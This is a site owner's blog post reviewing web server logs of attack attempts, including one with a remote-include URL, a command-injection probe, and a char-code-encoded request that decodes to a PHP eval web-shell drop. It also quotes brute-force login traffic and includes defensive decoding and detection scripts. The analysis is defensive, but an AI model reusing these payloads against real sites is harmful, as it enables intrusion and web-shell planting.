Website Attacks

I got bored and started looking through some old logs… Boy howdy, do they NOT impress.

Generic Internet Hacking

Log Entry 85.159.178.172 - - [14/Apr/2013:19:44:56 -0400] "GET /page/21/admin/sqlpatch.php/password_forgotten.php?action=execute HTTP/1.1" 404 25204 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1"
Country of Origin Italy
Source/Comments/Notes http://www.exploit-db.com/exploits/9005/, an attack from 2009 in 2013… stop trying.

Log Entry 64.207.145.168 - - [03/Jun/2013:00:31:28 -0400] "GET /admin/record_company.php/password_forgotten.php HTTP/1.1" 404 25363 "-" "Mozilla/5.0 (iPhone; U; CPU iPhone OS 3_1_2 like Mac OS X; en-us) AppleWebKit/528.18 (KHTML, like Gecko) Version/4.0 Mobile/7D11 Safari/528.16"
Country of Origin USA
Source/Comments/Notes http://www.exploit-db.com/exploits/9004/, an iPhone doing a Zen Cart exploit from 2009?! Sigh.

Log Entry 49.74.106.137 - - [25/Nov/2012:22:35:15 -0500] "GET /mysqlmanager/ HTTP/1.1" 404 21291 "-" "-"
Country of Origin China
Source/Comments/Notes This is just common Internet noise; there are TONS of scans like this all the time.

Log Entry 74.60.1.243 - - [12/Nov/2012:12:18:19 -0500] "GET /wp-content/uploads/2012/08/This_Is_Bryan_Checking_Out_Your_Life_Text_Me_If_You_See_This_hahaha_You_Hacker1.html HTTP/1.1" 404 5348 "-" "Mozilla/5.0 (Windows NT 6.1; rv:16.0) Gecko/20100101 Firefox/16.0"
Country of Origin USA
Source/Comments/Notes Apparently friends will even leave you 404 messages.

Log Entry 42.120.41.71 - - [28/Oct/2012:10:34:23 -0400] "GET /ad12/plugins/access.ssh/checkInstall.php?destServer=%7C%7Cecho%2043176 HTTP/1.1" 404 425 "-" "Googlebot/2.1 (+http://www.googlebot.com/bot.html)"
Country of Origin China
Source/Comments/Notes http://www.metasploit.com/modules/exploit/multi/http/ajaxplorer_checkinstall_exec The cool thing is this was 16 days after the initial Metasploit release. Given the time it takes to scan the whole Internet for it, they at least got around to me fairly quickly.

Log Entry 91.224.160.141 - - [30/Oct/2012:22:15:26 -0400] "GET /wp-content/pluginswp-property/action_hooks.php HTTP/1.1" 404 5334 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en; rv:1.9.2) Gecko/20100115 MRA 5.6 (build 03278) Firefox/3.6 (.NET CLR 3.5.30729)"
Country of Origin Netherlands
Source/Comments/Notes Stupid is as stupid does. What this idiot was TRYING to do was http://www.exploit-db.com/exploits/18987/, the problem being they forgot a / between plugins and wp-property. <sigh>

Log Entry 91.224.160.141 - - [30/Oct/2012:22:15:31 -0400] "GET /wp-content/pluginswp-filemanager/fm.php HTTP/1.1" 404 5334 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en; rv:1.9.2) Gecko/20100115 MRA 5.6 (build 03278) Firefox/3.6 (.NET CLR 3.5.30729)"
Country of Origin Netherlands
Source/Comments/Notes Same idiot, same problem. Wonder why you aren't getting any good hits?! http://packetstormsecurity.com/files/121637/WordPress-wp-FileManager-File-Download.html

Log Entry 91.214.72.40 - - [10/Oct/2012:11:55:34 -0400] "GET /tikiwiki/tiki-graph_formula.php?w=1&h=1&s=1&min=1&max=2&f[]=x.tan.phpinfo()&t=png&title=?src=http%3A%2F%2Fblogger.com.tunegrotto.com%2FIN.php HTTP/1.1" 404 23635 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
Country of Origin Italy
Source/Comments/Notes I hope this 5-year-old exploit isn't still working… yikes. http://www.metasploit.com/modules/exploit/unix/webapp/tikiwiki_graph_formula_exec

Log Entry 38.111.147.84 - - [04/May/2013:13:15:22 -0400] "GET /sfs3/modules/school_calendar/?act=getYearView&this_date=2012-08-01 HTTP/1.0" 404 5521 "-" "TurnitinBot/2.1 (http://www.turnitin.com/robot/crawlerinfo.html)"
Country of Origin USA
Source/Comments/Notes Not really sure about this one; not much info on sfs3…

Log Entry 78.85.76.103 - - [24/Apr/2013:19:31:36 -0400] "POST /wp-content/themes/famous/megaframe/megapanel/inc/upload.php HTTP/1.1" 404 25185 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
Country of Origin Russia
Source/Comments/Notes 8 months after release… http://secunia.com/advisories/49611/

Log Entry 78.85.76.103 - - [24/Apr/2013:19:31:34 -0400] "POST /wp-content/plugins/chillybin-competition/js/uploadify/uploadify.php HTTP/1.1" 404 25185 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
Country of Origin Russia
Source/Comments/Notes http://www.webologist.co.uk/internet-security/another-russian-invasion-wordpress-uploadify-targeted (they tried 39 different targets… thorough at least!)

Log Entry 211.24.68.143 - - [27/Jun/2013:05:20:14 -0400] "GET /HNAP1/ HTTP/1.1" 404 428 "http://108.3.191.212/" "Opera/6.x (Linux 2.4.8-26mdk i686; U) [en]"
Country of Origin Malaysia
Source/Comments/Notes http://www.sourcesec.com/Lab/dlink_hnap_captcha.pdf I bought a D-Link device once, never again.

More Interesting Traffic

So there is one that took a little effort to figure out:

Log Entry 198.20.175.42 - - [28/Jun/2013:11:52:16 -0400] "GET /plus/download.php?open=1&arrs1[]=99&arrs1[]=102&arrs1[]=103&arrs1[]=95&arrs1[]=100&arrs1[]=98&arrs1[]=112&arrs1[]=114&arrs1[]=101&arrs1[]=102&arrs1[]=105&arrs1[]=120&arrs2[]=109&arrs2[]=121&arrs2[]=116&arrs2[]=97&arrs2[]=103&arrs2[]=96&arrs2[]=32&arrs2[]=40&arrs2[]=97&arrs2[]=105&arrs2[]=100&arrs2[]=44&arrs2[]=101&arrs2[]=120&arrs2[]=112&arrs2[]=98&arrs2[]=111&arrs2[]=100&arrs2[]=121&arrs2[]=44&arrs2[]=110&arrs2[]=111&arrs2[]=114&arrs2[]=109&arrs2[]=98&arrs2[]=111&arrs2[]=100&arrs2[]=121&arrs2[]=41&arrs2[]=32&arrs2[]=86&arrs2[]=65&arrs2[]=76&arrs2[]=85&arrs2[]=69&arrs2[]=83&arrs2[]=40&arrs2[]=49&arrs2[]=49&arrs2[]=49&arrs2[]=55&arrs2[]=44&arrs2[]=64&arrs2[]=96&arrs2[]=92&arrs2[]=39&arrs2[]=96&arrs2[]=44&arrs2[]=39&arrs2[]=123&arrs2[]=100&arrs2[]=101&arrs2[]=100&arrs2[]=101&arrs2[]=58&arrs2[]=112&arrs2[]=104&arrs2[]=112&arrs2[]=125&arrs2[]=102&arrs2[]=105&arrs2[]=108&arrs2[]=101&arrs2[]=95&arrs2[]=112&arrs2[]=117&arrs2[]=116&arrs2[]=95&arrs2[]=99&arrs2[]=111&arrs2[]=110&arrs2[]=116&arrs2[]=101&arrs2[]=110&arrs2[]=116&arrs2[]=115&arrs2[]=40&arrs2[]=39&arrs2[]=39&arrs2[]=109&arrs2[]=121&arrs2[]=98&arrs2[]=97&arrs2[]=107&arrs2[]=46&arrs2[]=112&arrs2[]=104&arrs2[]=112&arrs2[]=39&arrs2[]=39
Country of Origin Canada
Source/Comments/Notes Now this one is actually interesting. It looks fairly normal, but the thing to realize is that "arrs1" and "arrs2" are arrays of numbers, and those numbers are the ASCII codes of characters (http://www.asciitable.com/). So what happens when we work with this a little more?

var test = "&arrs1[]=99&arrs1[]=102&arrs1[]=103&arrs1[]=95&arrs1[]=100&arrs1[]=98&arrs1[]=112&arrs1[]=114&arrs1[]=101&arrs1[]=102&arrs1[]=105&arrs1[]=120&arrs2[]=109&arrs2[]=121&arrs2[]=116&arrs2[]=97&arrs2[]=103&arrs2[]=96&arrs2[]=32&arrs2[]=40&arrs2[]=97&arrs2[]=105&arrs2[]=100&arrs2[]=44&arrs2[]=101&arrs2[]=120&arrs2[]=112&arrs2[]=98&arrs2[]=111&arrs2[]=100&arrs2[]=121&arrs2[]=44&arrs2[]=110&arrs2[]=111&arrs2[]=114&arrs2[]=109&arrs2[]=98&arrs2[]=111&arrs2[]=100&arrs2[]=121&arrs2[]=41&arrs2[]=32&arrs2[]=86&arrs2[]=65&arrs2[]=76&arrs2[]=85&arrs2[]=69&arrs2[]=83&arrs2[]=40&arrs2[]=49&arrs2[]=49&arrs2[]=49&arrs2[]=55&arrs2[]=44&arrs2[]=64&arrs2[]=96&arrs2[]=92&arrs2[]=39&arrs2[]=96&arrs2[]=44&arrs2[]=39&arrs2[]=123&arrs2[]=100&arrs2[]=101&arrs2[]=100&arrs2[]=101&arrs2[]=58&arrs2[]=112&arrs2[]=104&arrs2[]=112&arrs2[]=125&arrs2[]=102&arrs2[]=105&arrs2[]=108&arrs2[]=101&arrs2[]=95&arrs2[]=112&arrs2[]=117&arrs2[]=116&arrs2[]=95&arrs2[]=99&arrs2[]=111&arrs2[]=110&arrs2[]=116&arrs2[]=101&arrs2[]=110&arrs2[]=116&arrs2[]=115&arrs2[]=40&arrs2[]=39&arrs2[]=39&arrs2[]=109&arrs2[]=121&arrs2[]=98&arrs2[]=97&arrs2[]=107&arrs2[]=46&arrs2[]=112&arrs2[]=104&arrs2[]=112&arrs2[]=39&arrs2[]=39&arrs2[]=44&arrs2[]=39&arrs2[]=39&arrs2[]=60&arrs2[]=63&arrs2[]=112&arrs2[]=104&arrs2[]=112&arrs2[]=32&arrs2[]=101&arrs2[]=118&arrs2[]=97&arrs2[]=108&arrs2[]=40&arrs2[]=36&arrs2[]=95&arrs2[]=80&arrs2[]=79&arrs2[]=83&arrs2[]=84&arrs2[]=91&arrs2[]=109&arrs2[]=121&arrs2[]=98&arrs2[]=97&arrs2[]=107&arrs2[]=93&arrs2[]=41&arrs2[]=59&arrs2[]=63&arrs2[]=62&arrs2[]=39&arrs2[]=39&arrs2[]=41&arrs2[]=59&arrs2[]=123&arrs2[]=47&arrs2[]=100&arrs2[]=101&arrs2[]=100&arrs2[]=101&arrs2[]=58&arrs2[]=112&arrs2[]=104&arrs2[]=112&arrs2[]=125&arrs2[]=39&arrs2[]=41&arrs2[]=32&arrs2[]=35&arrs2[]=32&arrs2[]=64&arrs2[]=96&arrs2[]=92&arrs2[]=39&arrs2[]=96";
// Split on "&" so each item looks like arrs1[]=99. The string starts with "&",
// so the first item is empty; drop it or it would decode to a stray NUL byte.
var parts = test.split("&").filter(function (p) { return p !== ""; });
// For each item, keep just the number after the "="
var codes = parts.map(function (p) { return parseInt(p.split("=")[1], 10); });
// Convert each number to its ASCII character and join them into one string
var output = codes.map(function (c) { return String.fromCharCode(c); }).join("");
console.log(output); // or alert(output) in a browser

And we get: cfg_dbprefixmytag` (aid,expbody,normbody) VALUES(1117,@`\'`,'{dede:php}file_put_contents(''mybak.php'',''<?php eval($_POST[mybak]);?>'');{/dede:php}') # @`\'`

So the decoded text is a SQL INSERT fragment that stores a PHP snippet calling eval() on POST input: a web shell drop, hidden in plain sight as lists of numbers.
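Decoding these by hand is tedious, so here is an added example (not code from the original post) that pulls the request out of a combined-log line and decodes any PHP-style name[]=N arrays whose values are all printable ASCII codes, per array rather than concatenated. The sample line is constructed from the first 18 array values of the request above; the live request carries many more arrs2[] values.

```python
import re
from urllib.parse import parse_qsl, urlsplit

# Request field of an Apache combined-log line: "METHOD /path?query HTTP/x.y"
REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<uri>\S+) HTTP/[\d.]+"')

def decode_charcode_arrays(query, min_len=4):
    """Find PHP-style array parameters (name[]=N&name[]=N...) whose values are
    all integers in the printable-ASCII range and decode them to text.
    Returns {name: decoded_string} in first-seen order; each array is decoded
    on its own, so arrs1 and arrs2 come back as separate strings."""
    groups = {}
    for key, value in parse_qsl(query, keep_blank_values=True):
        if key.endswith("[]"):
            groups.setdefault(key[:-2], []).append(value)
    decoded = {}
    for name, values in groups.items():
        # short arrays and non-numeric values are ordinary parameters; skip them
        if len(values) < min_len or not all(v.isdigit() for v in values):
            continue
        codes = [int(v) for v in values]
        if all(32 <= c < 127 for c in codes):
            decoded[name] = "".join(chr(c) for c in codes)
    return decoded

def scan_log_line(line):
    """Extract the request URI from one access-log line and decode any
    char-code arrays in its query string. Returns {} when nothing matches."""
    m = REQUEST_RE.search(line)
    if not m:
        return {}
    return decode_charcode_arrays(urlsplit(m.group("uri")).query)

# Constructed sample: the first 18 array values of the /plus/download.php
# request quoted above; the real request carries many more arrs2[] values.
SAMPLE_LINE = (
    '198.20.175.42 - - [28/Jun/2013:11:52:16 -0400] "GET /plus/download.php'
    '?open=1&arrs1[]=99&arrs1[]=102&arrs1[]=103&arrs1[]=95&arrs1[]=100'
    '&arrs1[]=98&arrs1[]=112&arrs1[]=114&arrs1[]=101&arrs1[]=102&arrs1[]=105'
    '&arrs1[]=120&arrs2[]=109&arrs2[]=121&arrs2[]=116&arrs2[]=97&arrs2[]=103'
    '&arrs2[]=96 HTTP/1.1" 404 23635 "-" "-"'
)

if __name__ == "__main__":
    for name, text in scan_log_line(SAMPLE_LINE).items():
        print(f"{name}[] decodes to {text!r}")
```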

Brute Force Login Attempt

So then we get into the fun stuff: I've had 2 brute-force login operations.

178.151.216.53 (Ukraine) - - [20/Jun/2013:10:38:26 -0400] "POST /wp-login.php HTTP/1.1" 200 4383 "http://rageweb.info/wp-login.php" "Mozilla/5.0 (Windows NT 6.1; rv:21.0) Gecko/20100101 Firefox/21.0 [xUSAx]"

Someone in Ukraine made 689 login attempts between 19/Jun/2013:21:26:32 and 20/Jun/2013:10:38:26. 53 login attempts a minute… good try?

DISTRIBUTED Brute Force Login Attempt

The last one is WAY more complex. It's done in a DISTRIBUTED way, involving Amazon S3 servers and many others. The key giveaway to me was:

67.40.83.2 - - [27/Jun/2013:00:01:51 -0400] "POST /wp-login.php HTTP/1.0" 403 439 "-" "Mozilla/3.0 (compatible; Indy Library)"

A total of 628 login attempts, starting back in October. It gets better though: 46 countries were involved, and 278 unique IPs were used for the attack. Some crafty stuff! Below is a graph of the country of origin of all the UNIQUE IPs, and how many came from each country. Surprised to see GB doubling CN.

[Graph: dist_login, country of origin of the unique attacking IPs and the count from each country]
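Telling the two patterns apart from raw logs is a small scripting job. The following is an added example (not the author's code) that profiles POSTs to wp-login.php per source IP and User-Agent and flags the many-IPs-few-attempts-each shape that per-IP rate limiting misses. The sample lines are constructed to mirror the two entries above (RFC 5737 test addresses for the distributed set), and the thresholds are illustrative.

```python
import re
from collections import Counter
from datetime import datetime

# Apache combined log format, as in the entries quoted on this page.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<uri>\S+) '
    r'[^"]*" (?P<status>\d{3}) \S+ "[^"]*" "(?P<ua>[^"]*)"')

def login_attempt_profile(lines, path="/wp-login.php"):
    """Summarise POSTs to the login page. One IP carrying almost every attempt
    is the plain brute force; many IPs sending a few each is the distributed
    pattern, which per-IP rate limiting alone will not catch."""
    per_ip, per_ua, times = Counter(), Counter(), []
    for line in lines:
        m = LOG_RE.match(line)
        if not m or m["method"] != "POST" or m["uri"].split("?")[0] != path:
            continue  # unparseable lines and non-login requests are ignored
        per_ip[m["ip"]] += 1
        per_ua[m["ua"]] += 1
        times.append(datetime.strptime(m["ts"], "%d/%b/%Y:%H:%M:%S %z"))
    if not times:
        return {"attempts": 0}
    span_min = (max(times) - min(times)).total_seconds() / 60
    top_ip, top_n = per_ip.most_common(1)[0]
    share = top_n / len(times)
    return {
        "attempts": len(times),
        "unique_ips": len(per_ip),
        "top_ip": top_ip,
        "top_ip_share": share,
        "per_minute": len(times) / span_min if span_min else float(len(times)),
        "user_agents": dict(per_ua),
        # thresholds are illustrative; tune them to the site's real login volume
        "distributed": len(per_ip) >= 10 and share <= 0.2,
    }

# Constructed samples modelled on the two patterns above (RFC 5737 test IPs
# for the distributed set); not taken from the author's logs.
def _line(ip, ts, ua, status="200", proto="HTTP/1.1"):
    return f'{ip} - - [{ts} -0400] "POST /wp-login.php {proto}" {status} 439 "-" "{ua}"'

SINGLE_SOURCE = [_line("178.151.216.53", f"20/Jun/2013:10:3{i}:00",
                       "Mozilla/5.0 (Windows NT 6.1; rv:21.0) Gecko/20100101 Firefox/21.0")
                 for i in range(10)]
DISTRIBUTED = [_line(f"198.51.100.{i + 1}", f"27/Jun/2013:00:0{i}:51",
                     "Mozilla/3.0 (compatible; Indy Library)", "403", "HTTP/1.0")
               for i in range(10)]
```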
